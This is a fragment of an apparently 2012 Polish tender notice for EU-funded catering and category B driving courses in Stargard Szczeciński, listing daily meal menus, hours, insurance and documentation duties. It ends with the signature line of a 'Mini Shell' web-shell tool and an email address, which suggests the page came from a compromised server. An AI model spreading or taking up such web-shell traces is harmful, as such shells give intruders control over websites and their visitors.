- przestrzegania przepisów sanitarno-epidemiologicznych, bhp i p.poż. obowiązujących w zakładach zbiorowego zatrudnienia,
- obsługi kas fiskalnych,
- zajęć praktycznych.
2.	Dzienny wymiar zajęć nie powinien przekroczyć 8 godzin zegarowych z uwzględnieniem przerw, w tym jednej 20-sto minutowej na spożycie ciepłego posiłku.
3.	Ilość godzin szkolenia -  120 godzin/os.
4.	Miejsce realizacji szkolenia - pomieszczenia na terenie miasta Stargard Szczeciński. 
5.	Warunki lokalowe, sale szkoleniowe, także w miejscu szkolenia praktycznego oraz wykorzystywany sprzęt muszą spełniać wymogi w zakresie BHP i p. poż. 
6.	Wykonawca zapewnia: przerwy kawowe  (kawa, herbata, ciasteczka, cukier, śmietanka, woda, soki, owoce itp.), catering - ciepły posiłek w dniach:

- 17.09.12r. - kotlety mielone wieprzowe-150g, ziemniaki z wody-300g, surówka z kapusty 
                        czerwonej 150g.
- 18.09.12r. - gulasz wołowy 250g, kasza-200g, sałatka z kapusty pekińskiej 150g.
- 19.09.12r. - kotlet schabowy bez kości-150g, ziemniaki z wody-300g, surówka z marchewki 
                        i jabłek 150g.
- 20.09.12r. - filet z ryby smażonej-200g, ziemniaki z wody 300g, surówka z kiszonej             
                        kapusty-150g.
- 21.09.12r. - naleśniki z serem-450g.
- 24.09.12r. - kotlet z mięsa mielonego drobiowego-200g, ziemniaki z wody-300g, ogórek 
                        konserwowy-120g.
- 25.09.12r. - bitki z indyka lub szynki wieprzowej-150g, ziemniaki z wody-300g, sałatka 
                       z buraczków 150g.
- 26.09.12r. - ryż lub makaron na słodko z owocami-450g.
- 27.09.12r. - filet z kurczaka panierowany-160g, ziemniaki z wody-300g, marchewka 
                       zasmażana-150g.
- 28.09.12r. - pierogi ruskie-370g.
- 01.10.12r. - kopytka-225g, klopsiki z indyka w sosie pieczarkowym-150g, surówka z kapusty 
                        pekińskiej-150g.
- 02.10.12r. - gołąbki w sosie pomidorowym-490g.
- 03.10.12r. - kasza gryczana gotowana-150g, gulasz wieprzowy-135g, ogórek kiszony-120g.
- 04.10.12r. - schab duszony-120g, ziemniaki z wody-300g, buraczki czerwone-150.
- 05.10.12r. - filet mintaj w panierce-250g, ziemniaki z wody-300g, surówka z białej kapusty i   
                        jabłek-120g.

7.	Wykonawca zapewnia także : materiały szkoleniowe (w tym jeden dodatkowy do dokumentacji projektu), egzamin wewnętrzny i wydanie zaświadczenia o ukończeniu szkolenia oraz wykonanie minimum sanitarnego z elementami HACCP i badaniami do celów sanitarno-epidemiologicznych  (książeczka zdrowia). 
8.	Wykonawca zobowiązany jest ubezpieczyć uczestników szkolenia od następstw nieszczęśliwych wypadków.
9.	 Zaświadczenia, certyfikaty, materiały szkoleniowe, program szkolenia - muszą być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 - 2013
10.	Zajęcia w ramach kursu zrealizują nauczyciele/instruktorzy wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe.
11.	W przypadku zlecenia organizacji i realizacji kursu, wykonawca będzie prowadził dokumentację szkolenia, tj. imienne listy obecności z każdego dnia szkolenia, imienne listy potwierdzające poczęstunek, imienne listy odbioru materiałów szkoleniowych, protokoły                  z egzaminów. Wykonawca przekaże Zamawiającemu potwierdzone za zgodność z oryginałem kserokopie dokumentów kursu.
12.	Wykonawca wyda pisemną opinię o każdym uczestniku biorącym udział w szkoleniu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 17.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs prawa jazdy kat. B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Realizacja Kursu prawa jazy kat. B dla 24 osób w części dydaktycznej odbywać się będzie -                zgodnie z załączonym harmonogramem - w terminie od 8 października  2012r. do 12 października  2012r., natomiast część praktyczna - zgodnie z załączonym harmonogramem - w terminie  od 15 października  2012r. do 16 listopada 2012r. wg indywidualnych uzgodnień z instruktorem.
2.	Dzienny wymiar zajęć dydaktycznych nie powinien przekroczyć 6 godzin zegarowych z uwzględnieniem przerw kawowych.
3.	Zamawiający dopuszcza możliwość prowadzenia zajęć dydaktycznych z podziałem na grupy. Wykonawca jest obowiązany powiadomić Zamawiającego o ewentualnym podziale na grupy wraz z podaniem godzin oraz miejsca szkolenia dla poszczególnych grup. Nie dopuszcza się zmian w Harmonogramie stanowiącym załącznik nr 7 do siwz.
4.	Ilość godzin szkolenia -  60 godzin/os., w tym 30 godzin dydaktycznych (pełne godziny zegarowe) i 30 godzin praktycznych (pełne godziny zegarowe).
5.	Miejsce realizacji szkolenia: zajęcia dydaktyczne -  pomieszczenie na terenie miasta  Stargard Szczeciński, zajęcia praktyczne - plac manewrowy na terenie miasta  Stargard Szczeciński, zajęcia w ruchu miejskim Stargard Szczeciński, Szczecin.
6.	Warunki lokalowe oraz wykorzystywany sprzęt muszą spełniać wymogi prawne w zakresie BHP i p. poż. 
7.	Wykonawca  musi posiadać lub mieć możliwość dysponowania odpowiednią ilością pojazdów i instruktorów aby w terminie wskazanym w pkt 1 niniejszej części  przeszkolić skierowane przez Zamawiającego osoby.
8.	Wykonawca zobowiązany jest ubezpieczyć uczestników szkolenia od następstw nieszczęśliwych wypadków.
9.	Wykonawca do 7 grudnia 2012 roku skieruje wszystkie osoby na egzamin Państwowy oraz dokona jego opłaty.
10.	 Wykonawca w przypadku zajęć dydaktycznych zapewnia  przerwy kawowe - kawa, herbata, ciasteczka, cukier, śmietanka, woda, soki, owoce itp.
11.	Wykonawca zapewnia: sprzęt niezbędny do przeprowadzenia szkolenia, materiały szkoleniowe (podręczniki i płyty CD z testami egzaminacyjnymi, w tym jeden dodatkowy do dokumentacji projektu),  egzamin . W koszt Kursu należy wliczyć opłatę za pierwszy egzamin teoretyczny i praktyczny.
12.	Osoby skierowane na szkolenie będą posiadały zaświadczenie lekarza medycyny pracy                    o braku przeciwwskazań do wzięcia udziału w kursie i wykonywania zawodu kierowcy,                       na które Zamawiający skieruje uczestników w ramach realizacji projektu.
13.	Zaświadczenia, certyfikaty, materiały szkoleniowe, program szkolenia - muszą być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 - 2013.
14.	Zajęcia w ramach kursu zrealizują wykładowcy i instruktorzy wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe.
15.	W przypadku zlecenia organizacji i realizacji kursu, wykonawca będzie prowadził dokumentację szkolenia, tj. imienne listy obecności z każdego dnia szkolenia, imienne listy potwierdzające poczęstunek,  imienne listy odbioru materiałów szkoleniowych, protokoły                z egzaminów. Wykonawca przekaże Zamawiającemu potwierdzone za zgodność z oryginałem kserokopie dokumentów kursu.
16.	Wykonawca wyda pisemną opinię o każdym uczestniku biorącym udział w szkoleniu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 08.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com